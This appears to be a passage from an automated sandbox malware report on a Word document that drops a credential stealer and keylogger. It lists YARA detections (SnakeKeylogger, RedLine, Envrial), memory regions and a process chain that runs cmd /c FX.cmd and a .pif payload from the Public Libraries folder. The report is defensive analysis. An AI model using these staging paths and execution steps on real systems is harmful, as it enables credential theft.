          Source: 14.2.npratlsN.pif.36830000.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 14.2.npratlsN.pif.36830ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 8.3.npratlsN.pif.26ade320.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 8.2.npratlsN.pif.288e0000.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 14.2.npratlsN.pif.36830000.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 14.2.npratlsN.pif.33faa8ee.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 18.2.npratlsN.pif.206fa8ee.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 14.2.npratlsN.pif.33fa9a06.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 8.2.npratlsN.pif.288e0ee8.6.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 18.3.npratlsN.pif.1ea7e990.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 14.2.npratlsN.pif.36830ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 8.3.npratlsN.pif.26ade320.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 14.2.npratlsN.pif.33faa8ee.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 8.3.npratlsN.pif.26ade320.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 18.2.npratlsN.pif.206fa8ee.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 14.2.npratlsN.pif.33fa9a06.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 18.2.npratlsN.pif.206fa8ee.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 8.2.npratlsN.pif.288e0ee8.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 18.3.npratlsN.pif.1ea7e990.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 14.2.npratlsN.pif.36830ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 00000008.00000001.1851558247.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 0000000E.00000003.1973945813.0000000032410000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 00000012.00000002.3075258265.00000000206B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 00000008.00000002.3076004396.00000000288E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 00000008.00000002.3076004396.00000000288E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000008.00000002.3076004396.00000000288E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 00000012.00000002.3087171280.0000000022E20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 00000012.00000002.3087171280.0000000022E20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000012.00000002.3087171280.0000000022E20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 00000008.00000003.1855758823.0000000026ADE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 00000012.00000002.3088190466.0000000023470000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 00000012.00000002.3088190466.0000000023470000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000012.00000002.3088190466.0000000023470000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 00000008.00000002.3074954074.0000000028629000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 0000000E.00000002.3081475034.0000000033F69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 00000008.00000002.3047680567.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 00000008.00000002.3086497013.000000002B690000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 00000008.00000002.3086497013.000000002B690000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000008.00000002.3086497013.000000002B690000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 00000012.00000002.3047750977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 00000012.00000003.2053786801.000000001EA7E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 00000012.00000001.2046118520.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 0000000E.00000001.1967244493.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 0000000E.00000002.3094890159.0000000036830000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 0000000E.00000002.3094890159.0000000036830000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0000000E.00000002.3094890159.0000000036830000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 0000000E.00000002.3095731527.0000000036F80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 0000000E.00000002.3095731527.0000000036F80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0000000E.00000002.3095731527.0000000036F80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 0000000E.00000002.3047709158.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: Process Memory Space: npratlsN.pif PID: 8112, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: Process Memory Space: npratlsN.pif PID: 3980, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: Process Memory Space: npratlsN.pif PID: 7692, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 8.3.npratlsN.pif.26ade320.0.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
          Source: 8.3.npratlsN.pif.26ade320.0.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
          Source: 8.2.npratlsN.pif.2b690000.7.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
          Source: 8.2.npratlsN.pif.2b690000.7.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
          Source: 8.2.npratlsN.pif.2b690000.7.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
          Source: 8.2.npratlsN.pif.2b690000.7.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
          Source: 8.2.npratlsN.pif.2b690000.7.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
          Source: 8.2.npratlsN.pif.288e0ee8.6.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
          Source: 8.2.npratlsN.pif.288e0ee8.6.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
          Source: 8.2.npratlsN.pif.2866a8ee.4.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
          Source: 8.2.npratlsN.pif.2866a8ee.4.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
          Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winDOC@24/10@6/7
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_02907F52 GetDiskFreeSpaceA,4_2_02907F52
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,task_proc,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,8_2_004019F0
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_02916D48 CoCreateInstance,4_2_02916D48
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,task_proc,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,8_2_004019F0
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\Desktop\~$ ITS15235.docJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7720:120:WilError_03
          Source: C:\Users\Public\Libraries\npratlsN.pifMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3740:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8068:120:WilError_03
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{A4D78E82-8112-4A1D-9379-4990DA8275A1} - OProcSessId.datJump to behavior
          Source: PI ITS15235.docOLE indicator, Word Document stream: true
          Source: PI ITS15235.docOLE document summary: title field not present or empty
          Source: PI ITS15235.docOLE document summary: edited time not present or 0
          Source: C:\Users\Public\Libraries\npratlsN.pifCommand line argument: 08A8_2_00413780
          Source: C:\Users\Public\Libraries\npratlsN.pifCommand line argument: 08A8_2_00413780
          Source: C:\Users\Public\Libraries\npratlsN.pifCommand line argument: 08A8_1_00413780
          Source: C:\Users\Public\Libraries\npratlsN.pifCommand line argument: 08A14_2_00413780
          Source: C:\Windows\SysWOW64\brightness.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\brightness.exe C:\Windows\SysWOW64\brightness.exe
          Source: C:\Windows\SysWOW64\brightness.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\brightness.exeProcess created: C:\Users\Public\Libraries\npratlsN.pif C:\Users\Public\Libraries\npratlsN.pif
          Source: unknownProcess created: C:\Users\Public\Libraries\Nsltarpn.PIF "C:\Users\Public\Libraries\Nsltarpn.PIF"
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFProcess created: C:\Users\Public\Libraries\npratlsN.pif C:\Users\Public\Libraries\npratlsN.pif
          Source: unknownProcess created: C:\Users\Public\Libraries\Nsltarpn.PIF "C:\Users\Public\Libraries\Nsltarpn.PIF"
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFProcess created: C:\Users\Public\Libraries\npratlsN.pif C:\Users\Public\Libraries\npratlsN.pif
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\brightness.exe C:\Windows\SysWOW64\brightness.exeJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmdJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeProcess created: C:\Users\Public\Libraries\npratlsN.pif C:\Users\Public\Libraries\npratlsN.pifJump to behavior
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
